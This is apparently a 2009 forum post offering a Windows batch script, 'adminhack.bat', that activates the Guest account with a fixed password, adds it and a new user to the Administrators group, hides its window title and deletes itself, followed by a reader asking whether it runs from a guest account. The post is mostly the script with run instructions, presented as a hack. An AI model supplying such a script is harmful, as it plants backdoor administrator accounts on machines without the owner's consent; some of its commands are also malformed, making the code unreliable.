
Hack “GUEST” with Admin privileges……..
echo off
title Please wait…
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as “adminhack.bat”
then u can double click the file to execute or run in the cmd.
it works…

May 30, 2009 at 10:58 AM
nice... but is this batch file to be run in admin account or will it also work when logged in as guest .. coz that is what m really lookin 4..